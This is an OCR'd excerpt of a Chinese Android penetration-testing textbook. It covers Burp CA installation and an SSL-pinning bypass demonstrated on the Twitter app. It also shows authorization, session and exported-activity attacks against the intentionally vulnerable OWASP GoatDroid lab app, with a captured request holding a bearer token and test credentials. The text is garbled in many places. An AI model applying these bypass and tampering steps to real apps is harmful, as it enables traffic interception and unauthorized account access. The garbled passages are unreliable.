C:\> adb push cacert .cer /mnt/sdcard 


我 们 也 可 以 将 证 书 文件 拖 放 到 设备 中 。 根据 所 使 用 的 设备 和 安 卓 系统 版 本 , 用 于 存放 证 书 的 
目录 可 能 各 有 不 同 。 











6.3 ”移动 后 端 测试 方法 135 





Download Q tf 


/storage/emulated/0/Download 
0 Folders 1 Files 





Files 


Q cacert.cer 
May 10, 2016 





(6) HEA Settings | Personal | Security | Credential storage | Install from Storage， 选 择 .cer 文 件 ， 安 


装 证 书 
了 o 
1 OW E cu OT apps trom = sources 


Credential storage 
Storage type 


Software only 


Trusted credentials 
Display trusted CA certificates 


Install from storage 
Install certificates from storage 

















(7) 给 CA 取 一 个 名 字 。 如 果 和 暂时 不 用 它 来 存储 证 书 ， 你 需要 设置 PIN 码 。 


Name the certificate 


Certificate name: 


BurpProxy 


Credential use 
VPN and apps 


CANCEL OK 





aa 


(8) 如 果 一 切 顺利 ， 我 们 会 收 到 BurpProxy is Installed 的 提示 信息 。 
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(9) 我 们 可 以 进入 Trusted credentials 来 查看 证 书 是 否 安装 成 功 。 


ow Installation oT apps trom E sources 


Credential storage 





Storage type 
Software only 


Trusted credentials 
Display trusted CA certificates 


Install from storage 
Install certificates from storage 














(10) 点 击 Trusted credentials 选 项 后 ， 会 出 现 如 下 图 所 示 的 界面 。 


€ Trusted credentials 


SYSTEM 


PortSwigger 
PortSwigger CA 

















(11) 我 们 看 到 PortSwigger CA 证 书 已 经 安装 成 功 ， 这 样 就 不 会 再 出 现 证 书 警 告 。 
安装 Burp CA 证 书 可 以 避免 烦人 的 弹 窗 ， 帮 助 测试 人 员 节省 时 间 。 
HSTS 一 一 HTTP 严 格 传输 安全 


HSTS 可 以 帮助 支持 该 策略 的 客户 端 避免 cookie 窃 取 和 协议 降级 攻击 。 当 用 户 尝试 访问 HTTP 
网 页 时 ，HSTS 策 略 自动 将 客户 端 重 定向 至 https 连 接 ， 如 果 服 务 器 使 用 了 不 受信 任 的 证 书 ， 它 会 
阻止 用 户 接受 警告 以 及 继续 访问 。 可 以 使 用 下 面 的 头 文件 来 启动 HSTS : Strict-Transport- Security: 
max-age=31536000. 


将 CA 证 书 加 入 到 受信 任 证 书 存储 区 后 ， 重 定向 将 不 会 触发 证 书 警 告 ， 这 可 以 帮助 测试 人 员 
节省 时 间 。 





























6.3.2 REP ME 


在 前 文中 ,我 们 知道 了 如 何 拦 截 安 卓 应 用 的 SSL 流 量 。 本 节 将 介绍 如 何 绕 过 SSL 证 书 锁定 ， 
在 这 种 情况 下 应 用 会 进行 额外 的 检查 ， 并 验证 SSL 连 接 。 在 前 文中 ,我 们 已 经 知道 安 卓 设备 带 有 
一 组 可 信 的 CA， 而 且 安 草 设备 会 检查 目标 服务 器 的 证 书 是 否 是 由 这 些 可 信 的 CA 颁发 的 。 虽 然 这 
提高 了 数据 传输 的 安全 性 ,能 够 防止 中 间 人 攻击 , 但 是 我 们 很 容易 “欺骗 ”设备 的 受信 任 证 书 存 
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储 区 ， 安 装 一 个 伪造 的 证 书 ， 使 设备 信任 这 些 服务 器 ， 而 这 些 服 务 器 的 证 书 不 是 由 可 信 的 CA 和 颁 
发 的 。 证 书 锁定 技术 可 以 阻止 向 设备 的 受信 任 证 书 存 储 区 添加 证 书 ， 并 且 影 响 SSL 连 接 。 
有 了 证 书 锁定 技术 , 我 们 可 以 假设 应 用 知道 它 在 跟 哪 个 服务 器 通信 。 我 们 能 够 获得 服务 顺 的 


SSL 证 书 ， 然 后 把 它 添加 到 应 用 中 。 这 样 ， 应 用 就 不 需要 依赖 设备 的 受信 任 证 书 存储 区 ， 它 会 自 
行 检 查 并 验证 所 连接 的 服务 器 的 证 书 是 否 已 经 添加 到 应 用 中 。 这 就 是 证 书 锁定 技术 的 工作 方式 。 

Twitter 是 最 早 采 用 SSL 证 书 锁定 技术 的 流行 应 用 之 一 。 有 很 多 种 方法 可 以 绕 过 安 卓 应 用 的 证 
书 锁定 ， 其 中 一 种 最 简单 的 方法 就 是 反 编 译 应 用 的 二 进 制 文件 ， 并 打上 SSL 验 证 补丁 。 


建议 读者 阅读 下 面 的 文档 ,作者 是 Denis Andzakovic, 下 载 链接 :http:/www.security-assessment. 
com/files/documents/whitepapers/Bypassing%20SSL%20Pinning%200n%20Android%20via%20Rever 
se%20 Engineering.pdf. 
























































另外 ， 可 以 使 用 iecPartners 公 司 制 作 的 AndroidSSLTrustKiller 工 具 来 绕 过 证 书 锁定 。 它 是 
Cydia Substrate 的 一 个 扩展 工具 , 其 原理 是 , 通过 在 HttpsURLConnection.setSocketFactory () 
设置 断 点 以 及 修改 局 部 变量 来 绕 过 证 书 锁定 。 可 以 通过 下 面 的 链接 下 载 原 始 文档 : https://media. 
blackhat.com/bh-us-12/Turbo/Diquet/BH_US_12 Diqut Osborne Mobile Certificate Pinning Slides.pdf。 















































6.3.3 使 用 AndroidSSLTrustKiller 绕 过 证 书 锁定 


本 节 将 介绍 如 何 使 用 AndroidSSLTrustKiller 绕 过 Twitter 安 卓 应 用 ( 5.42.0 版 本 ) 的 SSL 证 书 锁定 。 
可 以 从 https://github.com/iSECPartners/Android-SSLTrustKiller/releases 中 下 载 AndroidSSLTrust Killer. 


当 安 卓 应 用 启用 了 证 书 锁定 ，Burp Suite 不 能 拦截 应 用 的 任何 流量 。 因 为 应 用 中 锁定 的 证 书 
5 2 i 匹配 。 在 安 卓 设备 上 安装 Cydia Substrate #llAndroidSSLTrustKillerf fe TAL. 

装 完成 后 ,需要 重启 设备 才能 使 更 改 生效 。 重 启 设备 后 ,重新 检测 Twitter 应 用 的 流量 ,我 们 可 
A 














(4) A Request to https://api.twitter.com:443 [199.59.149.232] 
Forward Drop intercept is on Action 
Raw | Params | Headers | Hex 


POST /auth/1/xauth_password.json HTTP/1.1 








X-Twitter-Client-AdID: 7a! 2 ida a254- 4a32-8359-dd12f180299f 

User-Agent: TwitterAndroid/5.42.0 (4030796-r-721) C1505/4.1.1 (Sony;C1505;Sony;C1505_1270-8755;0;;1) 
X-Twitter-Client-Version: 5.42.0 

IGeolocation: 

X-Twitter-API-Version: 5 

Accept-Language: a: -IN 

Authorization: Bearer AAAAAAAAAAAAAAAAAAAAAFXZAWAAAAAAMHCxpeSDGlgLNLghVe8d74hl6k4%3D 
RUMPAxAOLsbeBhTSRrCQpJtxoGHeyHrDb5te2 jPGSkHDFW82F 

X-Twitter-Client: TwitterAndroid 

Timezone: Asia/Singapore 

Accept-Encoding: gzip 

X-Twitter- eni pey icar; b956a0e482719bc1 

Accept: application/js 

X-Client-UUID: 4909abef— 6207-41 1a-aadf-ab2425164378 

Content-Length: 164 

Content-Type: application/x-www-form-urlencoded 

Host: api.twitter.com 

Connection: Keep-Alive 


x_auth_identifier=hackingandroidssltest%40gmail.com&x_auth_password=hackingandroidssltesté 
send_error_codes=truesx_auth_login_verification=1éx_auth_login_challenge=1&x_auth_country_code=IN 
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安装 示例 应 用 


我 们 将 使 用 易 受 攻击 的 OWASP GoatDroid 应 用 来 演示 服务 器 端 漏 洞 , 因为 从 服务 器 端 攻击 的 
角度 来 看 ， 服 务 器 端的 漏洞 都 很 常规 。 


e OWASP GoatDroid 应 用 











GoatDroid 有 两 个 应 用 ， 即 FourGoats 和 Herd Financial。 在 本 章 中 ， 我 们 使 用 后 者 一 一 一 个 虚 
拟 的 银行 应 用 。 


下 面 是 安装 GoatDroid 应 用 的 步 又 。 
(1) 在 移动 设备 上 安装 移动 应 用 ( 客户 端 )。 
(2) 运行 GoatDroid 的 Web 服 务 右 。 


可 以 从 下 面 的 链接 下 载 GoatDroid: https://github.com/downloads/jackMannino/OWASP-Goat 
DroidProject/OWASP-GoatDroid-0.9.zip. 


(3) 解压 下 载 好 的 ZIP 文 件 ， 运 行 下 面 的 命令 启动 后 台 服 务 器 应 用 。 在 HerdFinanicial 中 点 击 
Start Web Service 按 钮 来 启动 Web 服 务 。 


C:\OWASP-GoatDroid-Project\>java -jar goatdroid-0.9.jar 


(4) 使 用 下 面 的 命令 将 GoatDroid Herd Financial 应 用 安装 到 设备 上 。 





C:\OWASP-GoatDroid-Project\ goatdroid_apps\FourGoats\android_ 
app>adb install "OWASP GoatDroid- Herd Financial Android App.apk" 


(5) 你 也 可 以 从 Web 服 务 界面 推送 应 用 ， 如 下 图 所 示 。 
































{S| OWASP GoatDroid lee x J 

File Configure View Tools About GoatDroid 

Apps Description | 

[ FourGoat 

D HerdFinancial Start Emulator Push App To Device ‘Start Web Service 
ial DROID, 


Description | 


Mobile and Banking go together like peanut butter and jelly. Herd Financial is a banking application, gone | 
wrong. This application allows you to check your balance, make transfers, and view your banking history. it's a 
‘simple application and nothing could possibly go wrong, right? 


Getting Started 


[To get started, follow these simple steps: 
the web senice through the Go: ae id GUI 
T id 





incom page, hit the menu button and select the Destination Info option 
4. Enter the IP address ate ost whore the web sonics i ston ing (not 127.0.0.1) 
5. Log into the Herd Financial application with username: joegoat password: goatdroid 


Security Flaws 


[You may encounter some of the following issues within this application: 
cation 





ic Flaws 
ide Authorization Issues 
IPC 





Data Storage 
nt Transport Layer Protection 



































= mea 一 一 | 
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我 们 需要 在 移动 应 用 主 界面 中 的 Destination Info 选 项 里 设置 服务 器 的 卫 地 址 和 端口 号 
(9888 )。 然 后 ， 按 照 前 面 介绍 过 的 方法 设置 代理 以 便 拦截 网 络 请 求 。 


默认 登录 账号 和 密码 均 为 goatdroid。 


6.3.4 ”后 端 威 胁 


Web 服 务 (SOAP/RESTful ) 是 一 种 在 HTTP/HTTPs 上 运行 的 服务 ， 与 Web 应 用 很 相似 。 针 对 
Web 应 用 的 攻击 同样 可 能 发 生 在 移动 后 端 。 下 面 介绍 API 中 一 些 常见 的 安全 问题 。 


1. OWASP 十 大 移动 应 用 风险 及 Web 攻 击 


我 们 尝试 将 服务 器 端 安全 问题 与 OWASP 十 大 移动 应 用 风险 联系 起 来 ， 并 从 另 一 种 角度 看 待 
这 些 问 题 。 由 于 前 面 的 章节 已 经 讨论 过 客户 端 攻击 ， 这 里 不 再 歼 述 。 








OWASP 移 动 10 大 风险 


UE i 国 M3: 传输 层 M4; 意外 的 


端 控制 数据 存储 保护 不 足 数据 泄漏 


M5， 精 糕 的 授 是 M6:， 加 密 技术 : 客户 端 MS: 通过 不 受 
权 和 身份 认证 破解 注入 信任 的 输入 进 
行 安 全 决策 

M9; 会 话 处 理 I} M10, 二 进 制 

不 当 文件 保护 不 足 


在 OWASP 十 大 移动 应 用 风险 中 ， 下 面 几 个 风险 与 服务 絮 端 有 关 ， 我 们 将 会 围绕 这 儿 点 进行 


讨论 。 


O M1: 弱 服 务 器 端 控制 

O M2: 不 安全 的 数据 存储 

O M3: 传输 层 保护 不 足 

OMS: 糟糕 的 授权 和 身份 认证 

口 M6: 加 密 技术 破解 

口 M8: 通过 不 受信 任 的 输入 进行 安全 决策 
O M9: 会 话 处 理 不 当 





















































2. 认证 与 授权 问题 
大 部 分 Web 服 务 使 用 自 定义 身份 验证 来 对 API 进 行 认证 ， 通 常 令 牌 存储 在 客户 端 中 ， 每 次 请 
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求 都 会 用 到 。 除 了 要 测试 令 牌 存储 安全 外 ， 我 们 还 要 确保 以 下 几 点 : 


O 通过 TLS 安 全 传输 证 书 ; 

口 使 用 强 TLS 算 法 套件 ; 

口 服务 器 端 使 用 了 合适 的 认证 ; 

口 保护 登录 页 面 和 端点 免 受 暴 力 破解 漏洞 ; 
口 使 用 强 会 话 验证 。 


你 可 以 在 OWASP 测 试 指南 与 速 查 表 中 获得 更 多 关于 认证 和 授权 攻击 的 信息 。 
接 下 来 ， 我 们 将 使 用 OWASP GoatDroid 应 用 来 演示 一 些 认证 和 授权 漏洞 。 
与 十 大 移动 应 用 风险 相关 的 是 M5 和 M1 。 

o 认证 漏洞 

该 应 用 允许 用 户 登 录 、 注 册 账 号 、 找 回 密码 ， 如 下 图 所 示 。 















































he. 





User Name 


goatdroid 


Password 


Forgot Password 











我 们 尝试 注册 一 个 账号 ， 并 查看 客户 端 给 API 发 送 了 什么 请 求 。 





Account Number 
1234567889 


User Name 





6.3 ”移动 后 端 测试 方法 141 





如 果 尝 试 使 用 相同 的 银行 账号 或 用 户 名 注册 ， 会 发 生 什 么 ? 





Go Cancel Lir. >I" Target: https://192.168.1.4:9888 (4) (2) 











Request Response 
| [Raw Params | Headers | Hex Raw | Headers 

POST /herdfinancial/api/vl/register HTTP/1.1 a HTTP/1.1 200 OK 
Content-Length: 93 Content-Type: application/json 


Content-Type: application/x-www-form-ur lencoded Connection: close 
Host: 192.168.1.4:9888 Server: Jetty(7.x.y-SNAPSHOT) 
Connection: close 

{"success":"true"} 
jaccountNumber=1234567889kfirstName=test ingélastName=test 
ingéuserName=test ingGuyépassword=1234 A 








有 趣 的 是 ， 我 们 能 看 到 用 户 名 和 银行 账号 。 





Go Cancel | | <47) | > Target: https://192.168.1.4:9888 |4] [2 | 











Request Response 

| Raw | Params | Headers | Hex | Raw | Headers | Hex 

POST /herdfinancial/api/vl/register HTTP/1.1 a HTTP/1.1 200 OK a 
Content-Length: 93 Content-Type: application/json 

Content-Type: application/x-www-form-urlencoded Connection: close 


Host: 192.168.1.4:9888 Server: Jetty(7.x.y-SNAPSHOT) 

Connection: close 

{"success":"false","errors":"Username already 
jaccountNumber= 1234567889 éfirstName=testingélastName=test registered") 

ingcuserName=test ingGuyépassword=1234 A 














如 上 图 所 示 , 我 们 可 以 尝试 不 同 的 认证 和 授权 场景 。 攻 击 者 越 有 创造 性 就 越 有 可 能 找到 越 多 
的 攻击 途径 。 


@ 授权 漏洞 








用 户 可 以 在 应 用 中 查看 余额 、 转 账 信息 以 及 对 账单 ， 如 下 图 所 示 。 


Home 


Check Balance 


Transfer Funds 


View Account Statements 





我 已 经 按照 前 面 介绍 的 步 又 完成 了 Burp Suite 的 设置 ， 可 以 用 它 来 拦截 HTTP/HTTPS 请 求 。 


点 击 Check Balance 按 钮 ， 向 服务 器 请 求 账 号 余额 信息 。 我 们 能 看 到 从 /balances 端 点 向 服务 器 
发 送 了 一 个 请 求 。 请 记录 银行 账号 1234567890 、 会 话 ID 和 AUTH=721148。 


如 下 图 所 示 ， 这 个 账户 余额 为 947.3。 
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E Burp Suite Free Edition v1.7.01beta - Temporary Project | = =] 











Burp Intruder Repeater Window Help 





Target | Pr | Spider | Scanner [intruder i Repeater | Se [ T [Comparer | Extender | Project options | Te options ] Mens | Logger | q 


mA 


Go aaa <j > Target: https://192.168.1.4:9888 $. | ? | 





























Request Response 
Raw | Params | Headers | Hex Raw | Headers Hex | 
GET /herdfinancial/api/vl/balances/ 1234567890 HTTP/1.1 a HTTP/1.1 200 OK A 
Cookie: AUTH=7211482 Content-Type: application/json 
Host: 192.168.1.4:9888 Connection: close 
Connection: close Server: Jetty(7.x.y-SNAPSHOT) 





":"true", "checkingBalance": "947.3", "savingsBal 


0.0") A 


























移动 应 用 上 也 显示 了 相同 的 余额 信息 。 


Get Balance 


Checking: 947.3 








由 于 后 台 没 有 进行 适当 的 授权 检查 , 我 们 可 以 将 账号 修改 为 其 他 账号 来 查看 对 应 账号 的 余额 


信息 。 




















E Burp Suite Free Edition v1.7.01beta - Temporary Project Sex| 


Burp Intruder Repeater Window Help 














Target | Proxy | Spider | Scanner | Intruder | Repeater | Sequencer [ Decoder | Comparer | Extender | Project options [ User options | Alerts | Logger | 


Go | ancel 和 jw > Target: https://192.168.1.4:9888| LF) 出 
































Request Response 

Raw | Params | Headers | Hex Raw | Headers | Hex 
BET /herdfinancial/api/vi/balances/987€543210 HTTP/1.1 a HTTP/1.1 200 OK A 
Cookie: AUTH=7211482 Content-Type: application/json 
Host: 192.168.1.4@588 Connection: close 
Connection: close Server: Jetty(7.x.y-SNAPSHOT) 

someone else a/cjno. 
ee {"success": "true", "checkingBalance” "savingsBa 
same session id lance": "0.0") 




















同样 ， 移 动 应 用 也 显示 了 相同 的 余额 信息 ， 即 余额 为 414.56。 





(Get Balance 


Checking: 414.56 
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3. 会 话 管理 


会 话 管理 是 指 如 何在 移动 应 用 中 保持 状态 。 如 前 文 所 述 , 通常 使 用 认证 令 牌 来 进行 会 话 管理 。 
下 面 是 会 话 管理 中 一 些 常 见 的 问题 : 


口 生成 的 令 牌 过 弱 , SHKE, (eS E; 
口 通过 不 安全 的 方式 传输 会 话 令 牌 post 认 证 ; 
O 服务 需 端 缺乏 合适 的 终止 会 话 的 处 理 。 


想 要 获得 更 多 关于 会 话 管理 攻击 的 信息 ， 可 以 阅读 OWASP 测 试 指南 与 速 查 表 。 
与 十 大 移动 应 用 风险 相关 的 是 M3 和 M1。 


在 “认证 与 授权 问题 ”一 节 中 ， 我 们 介绍 了 AUTH 会 话 令 牌 使 用 弱 密 码 令 牌 。 我 们 至 少 应 该 
使 用 经 过 试验 和 验证 过 的 随机 数 来 创建 令 牌 。 
















































































J Burp Suite Free Edition v1.7.01beta - Temporary Project =e) 
Burp Intruder Repeater Window Help 
| Target | Proxy | Spider | Scanner | Intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Project options | User options | Alerts | Logger | 
a 
Go Cancel <ly >I\" Target: https://192.168.1.4:9888} (4) (2) 
Request Response 
Raw | Params | Headers | Hex Raw | Headers | Hex 
BET /he eatinencieliany /vi/balances/987€543210 HTTP/1.1 A HTTP/1.1 200 OK a 
cookie: AUTH=7211482 Content- Type 4 pid ication/json 
Host: 192 ere a 4 pce Conn 
Connect ii Serv: pee ie . Y-SNAPSHOT) 
someone else a/c; no: 
same session id) lance": "0.0") 














4. 传输 层 保护 不 足 


虽然 使 用 SSL/TLS 的 成 本 比 以 前 低 ， 但 是 我 们 发 现 很 多 应 用 仍然 没有 使 用 TLS， 或 者 已 经 使 
FAY, 但 配置 很 差 。 对 于 移动 应 用 来 说 ， 中 间 人 攻击 是 一 种 相当 严重 的 威胁 ,我 们 必须 确保 安 卓 
应 用 至 少 进行 以 下 安全 检查 : 


O 只 使 用 HSTS 通 过 SSL/TLS 传 输 数 据 ; 
口 使 用 CA 证 书 与 服务 器 通信 ; 
口 使 用 证 书 锁 定 进行 证 书 链 验 证 。 


示例 应 用 没有 使 用 任何 最 佳 实践 ， 比 如 CA 证 书 、HSTS、 证 书 锁定 等 。 因 此 ， 使 用 burp 代 理 
不 会 出 现任 何 问 题 。 


与 十 大 移动 应 用 风险 相关 的 是 M5 和 M1 。 









































时 


> 
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5. 输入 验证 相关 的 问题 











输入 框 是 进入 应 用 的 入 口 , 对 移动 应 用 来 说 也 是 如 此 。 如 果 服 务 器 端 没 有 进行 输入 验证 控制 ， 
就 会 经 常 出 现 SQL 注 入 、 命 令 注 和 信和 跨 站 脚本 漏洞 。 


与 十 大 移动 应 用 风险 相关 的 是 M5、M1 和 M8。 
6. 异常 处 理 不 当 




















攻击 者 可 以 从 报错 信息 中 收集 很 多 重要 的 信息 。 如果 异常 处 理 不 当 , 攻击 者 可 以 利用 这 些 信 
， 降 低 服务 器 的 安全 性 。 


与 十 大 移动 应 用 风险 相关 的 是 M1。 
7. 不 安全 的 数据 存储 


ey 

















前 文 已 经 讲解 了 客户 端 数据 存储 安全 , 因此 这 里 只 考虑 服务 器 端的 情况 。 如 果 服 务 器 端 数 据 
以 明文 的 形式 存储 , 一 旦 攻击 者 获得 访问 后 端的 权限 ,他 就 可 以 利用 这 些 信息 。 必 须 使 用 散 列 的 
格式 存储 密码 ， 如 果 条 件 允 许 的 话 ， 应 该 加 密 暂 时 不 会 使 用 的 数据 ， 包 括 备份 的 数据 。 


与 十 大 移动 应 用 风险 相关 的 是 M2 和 M1。 




















如 下 图 所 示 ，Herd Financial 示 例 应 用 以 明文 的 形式 存储 用 户 的 登录 信息 。 如 果 攻 击 获得 了 这 
些 信息 ， 他 就 可 以 登录 每 一 个 账号 ， 然 后 将 里 面 的 钱 转 到 离 岸 账户 。 

























































































lé] Database Browser l clie 
| Databases { Query 
(J Databases SELECT * FROM users 
© (J fourgoats 
? J herdfinancial 
D TRANSACTIONS 
D Users 
Execute Statement 
Results 
USERNAME PASSWORD SESSIONTOKEN 
oatdroi' d goatdroid I0 
rane igoatdroid 0 
igoatdroid 518874 
Current Database: herdfinancial 4l 0 ID 






































8. 数据 库 攻击 


注意 , 攻击 者 可 能 在 未 经 授权 的 情况 下 直接 访问 数据 库 。 例 如 , 在 没有 使 用 强 证 书 进行 保护 
的 情况 下 ， 攻 击 者 可 能 在 未 经 授权 的 情况 下 访问 像 phpmyadmin 这 样 的 数据 库 控 制 台 。 再 比如 ， 
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攻击 者 有 可 能 直接 访问 未 经 授权 的 MongolianDB 控 制 台 , 因为 MongoDB 默 认 不 需要 任何 认证 就 可 
以 直接 访问 它 的 控制 台 。 


与 十 大 移动 应 用 风险 相关 的 是 M1。 


我 们 讨论 了 不 同 的 服务 器 端 漏 洞 ， 如 何 配 置 Burp Suite 来 对 服务 器 端 问题 进行 测试 ， 以 及 绕 
过 HSTS 、 证 书 锁定 的 技术 。 











6.4 小 结 


本 章 通过 分 析 OWASP 十 大 风险 中 常见 的 漏洞 ， 简 要 介绍 了 服务 器 端 攻击 ， 还 讨论 了 配置 代 
理 的 不 同方 法 。 绕 过 证 书 锁定 技术 看 起 来 很 基础 ， 但 如 果 我 们 需要 为 substrate 或 者 Xposed 框 架 编 
写 一 些 扩展 ， 这 也 是 一 种 难忘 的 经 历 。 


下 一 童 将 讨论 如 何 对 移动 应 用 进行 静态 分 析 。 























Psi Lc —— BAS TAT IAR 

















上 一 章 介绍 了 针对 安 卓 应 用 服务 器 端的 攻击 。 本 章 将 从 静态 应 用 安全 测试 的 角度 讲解 各 种 针 
对 客户 端的 攻击 , 而 下 一 章 则 会 从 动态 应 用 安全 测试 的 角度 介绍 针对 客户 端的 攻击 , 同时 还 会 介 
绍 一 些 自动 化 工具 。 想 要 成 功 实施 本 章 中 的 大 部 分 攻击 , 攻击 者 首先 要 说 服 受 害 者 在 其 手机 上 安 
装 一 个 恶意 应 用 。 此 外 ， 如 果 攻 击 者 拥有 设备 的 物理 访问 权限 ， 也 可 能 成 功利 用 应 用 。 

下 面 是 本 章 将 要 讨论 的 部 分 主要 内 容 。 


口 攻击 应 用 组 件 




















Q) activity 
a 服务 
o 广播 接收 需 


口 内 容 提供 程序 

O 内 容 提供 程序 泄漏 

O 内 容 提 供 程 序 SQL 注 入 

口 使 用 QARK 进 行 自动 化 静态 分 析 














7.1 攻击 应 用 组 件 


在 第 3 草 中 ， 我 们 简要 介绍 了 安 章 应 用 的 组 件 。 本 闻 将 介绍 很 多 可 能 针对 安 草 应 用 组 件 的 攻 
击 。 建 议 先 阅读 第 3 章 ， 以 便 更 好 地 理解 这 些 概 念 。 








7.1.1 针对 activity 的 攻击 


导出 的 activity 是 安 草 应 用 组 件 在 渗透 测试 中 经 常 遇 到 的 问题 之 一 。 导出 的 activity 可 以 被 同一 
设备 上 的 其 他 应 用 调用 。 想 象 一 下 这 种 情形 : 应 用 有 一 个 导出 的 敏感 activity， 同 时 用 户 安 装 了 一 
个 恶意 应 用 , 它 会 在 手机 每 次 连接 充电 器 的 时 候 调 用 这 个 activity。 当 应 用 具有 未 受 保 护 的 敏感 功 
能 时 ， 这 种 情况 是 有 可 能 发 生 的 。 
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1. 导出 行为 对 activity 意 味 着 什么 




















下 面 是 安 卓 文档 关于 导出 





属性 的 描述 。 





activity 是 否 能 被 其 他 应 用 的 组 件 调 用 ? 如 果 导 出 属性 为 true， 那 么 activity 可 以 被 其 他 应 用 


的 组 件 调 用 ; 如 果 为 false, 则 activity 只 能 被 同一 个 应 用 或 者 具有 相同 用 户 耳 的 应 用 的 组 件 调用 。 











导出 属性 默认 值 取决 于 activity 是 否 包 含 Intent 过 滤器 。 如 果 不 包含 过 滤器 ， 那 么 只 能 通过 指 
定 准确 的 类 名 才能 调用 activity。 这 意味 着 这 个 activity 只 能 在 应 用 内 部 使 用 ( 因为 其 他 应 用 不 知道 


这 个 activity 的 类 名 )。 在 这 种 情况 下 ，activity 的 导出 





属性 默认 值 为 false。 另 外 ， 如 果 出 现 了 多 





WwW 











个 过 滤器 ， 则 意味 着 这 个 activity 可 以 被 外 部 使 用 的 ，activity 的 导出 属性 默认 值 为 Lrue。 


所 以 如果 应 用 包含 一 个 导出 的 activity， 那么 其 他 应 用 可 以 调用 它 。 接 下 来 , 我们 将 介绍 攻 
击 者 如 何 利用 这 一 特性 来 攻击 应 用 。 


我 们 使 用 OWASP 的 GoatDroid 应 用 来 进行 演示 。GoatDroid 是 一 款 包含 多 个 漏洞 的 应 用 , 可 以 


从 下 面 的 链 





9.zip。 




















接 下 载 : https://github.com/downloads/jackMannino/OWASP-GoatDroid-Project/OWASP- 
GoatDroid-0. 


可 以 使 用 Apktool 工 具 从 apk 文 件 中 获取 AndroidManifest.xml 文 件 ， 具体 方法 参见 第 8 章 。 下 面 

















<?xml version="1.0" 
<manifest android:versionCode="1" 


encoding="utf£-8"?> 


package="org.owasp.goatdroid.fourgoats" 
xmlns:android="http://schemas.android.com/apk/res/android"> 
<application android:theme="@style/Theme.Sherlock" 


android: label="@string/app_name" 


android: debuggable="true"> 
<activity android: label="@string/app_name" 
android:name=".activities.Main"> 
<Intent-filter> 
<action android:name="android.Intent.action.MAIN" /> 
<category android:name 
="android.Intent.category.LAUNCHER" /> 
</Intent-filter> 
</activity> 


<ac 


tivi 


andro 


<ac 


tivi 


andro 


<ac 


tivi 


andro 


<act 


ivi 


andro 


<ac 


tivi 


andro 


<ac 





tivi 


Ly 
id: 
Ly 
id: 
Ly 
id: 
Ly 
id: 
Ly 
id: 
Ly 





android: 


android:1 


abe 


1l="@s 


name=".activities 


android:1 


abe 


l="@s 


name=".activities 


android:1 


abe 


1l="@s 


name=".activities 


android:1 


abel 


="@as 


. Home" 


是 从 GoatDroid 应 用 中 得 到 的 AndroidManifest.xml 文 件 。 


android:versionName="1.0" 


android:icon="@drawable/icon" 


tring/login" 
.Login" /> 
tring/register" 
.Register" /> 
tring/home" 


f= 


tring/checkin" 


name=".fragments.DoCheckin" /> 


android: ] 


Labe 


l="@s 


name=".activities 





android:1 


abe 





1l="@s 





tring/ 


tring/checkins" 
.Checkins" /> 





friends" 


name=".activities.Friends" /> 
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<activity android:label="@string/history" 

android:name=".fragments.HistoryFragment" /> 

<activity android: label="@string/history" 

android:name=".activities.History" /> 

<activity android:label="@string/rewards" 
android:name=".activities.Rewards" /> 

<activity android:label="@string/add_venue" 
android:name=".activities.AddVenue" /> 

<activity android:label="@string/view_checkin" 
android:name=".activities.ViewCheckin" 

android:exported="true" /> 

<activity android: label="@string/my_friends" 

android:name=".fragments.MyFriends" /> 

<activity android:label="@string/search_for_friends" 

android:name=".fragments.SearchForFriends" /> 

<activity android: label="@string/profile" 
android:name=".activities.ViewProfile" 

android:exported="true" /> 

<activity android: label="@string/pending_friend_requests" 

android:name=".fragments.PendingFriendRequests" /> 

<activity android: label="@string/friend_request" 

android:name=".activities.ViewFriendRequest" /> 

<activity android: label="@string/my_rewards" 

android:name=".fragments.MyRewards" /> 

<activity android:label="@string/available_rewards" 

android:name=".fragments.AvailableRewards" /> 

<activity android: label="@string/preferences" 
android:name=".activities.Preferences" /> 

<activity android:label="@string/about" 
android:name=".activities.About" /> 

<activity android:label="@string/send_sms" 
android:name=".activities.SendSMS" /> 

<activity android:label="@string/comment" 
android:name=".activities.DoComment" /> 

<activity android: label="@string/history" 

android:name=".activities.UserHistory" /> 

<activity android:label="@string/destination_info" 
android:name=".activities.DestinationInfo" /> 

<activity android:label="@string/admin_home" 
android:name=".activities.AdminHome" /> 

<activity android: label="@string/admin_options" 

android:name=".activities.AdminOptions" /> 

<activity android:label="@string/reset_user_passwords" 

android:name=".fragments.ResetUserPasswords" /> 

<activity android:label="@string/delete_users" 

android:name=".fragments.DeleteUsers" /> 

<activity android:label="@string/reset_user_password" 
android:name=".activities.DoAdminPasswordReset" /> 

<activity android:label="@string/delete_users" 
android:name=".activities.DoAdminDeleteUser" /> 

<activity android:label="@string/authenticate" 
android:name=".activities.SocialAPIAuthentication" 

android:exported="true" /> 

<activity android: label="@string/app_name" 
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android:name=".activities.GenericWebViewActivity" /> 
<service android:name=".services.LocationService"> 
<Intent-filter> 
<action android:name= 
"org.owasp.goatdroid.fourgoats. 
services.LocationService" /> 
</Intent-filter> 
</service> 
<receiver android:label="Send SMS" 
android:name=".broadcastreceivers.SendSMSNowReceiver"> 
<Intent-filter> 
<action android:name= 
"org.owasp.goatdroid.fourgoats.SOCIAL_SMS" /> 
</Intent-filter>> 
</receiver> 
</application> 
<uses-permission android:name="android.permission.SEND_SMS" /> 
<uses-permission android:name="android.permission.CALL_PHONE" 
/> 
<uses-permission 
android:name="android.permission.ACCESS_COARSE_LOCATION" /> 
<uses-permission 
android:name="android.permission.ACCESS_FINE_LOCATION" /> 
<uses-permission android:name="android.permission.INTERNET" /> 


根据 从 上 面 的 文件 ， 通 过 将 android:exported 的 属性 设置 为 Ltrue， 我 们 可 以 看 出 一 些 组 
件 是 导出 的 。 下 面 的 这 段 代码 就 是 一 个 这 样 的 activity。 





<activity android:label="@string/profile" android:name=".activities. 
ViewProfile" android:exported="true" /> 


设备 上 的 其 他 恶意 应 用 可 以 调用 这 个 activity。 为 了 便于 演示 说 明 ， 我 们 使 用 aqb 来 进行 相同 
的 操作 ， 而 不 是 编写 一 个 恶意 应 用 。 


启动 这 个 应 用 ， 它 调用 了 一 个 acitivity， 要 求 输入 用 户 名 和 密码 才能 登录 。 



































QA Login 


Username 


Password 


Y Remember Me 


Login 


Register 
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运行 下 面 的 命令 会 绕 过 身份 认证 ， 直 接 看 到 ViewProfile activity。 


$ adb shell am start -n org.owasp.goatdroid.fourgoats/.activities. 
ViewProfile 


我 们 来 解释 一 下 上 面 的 命令 。 

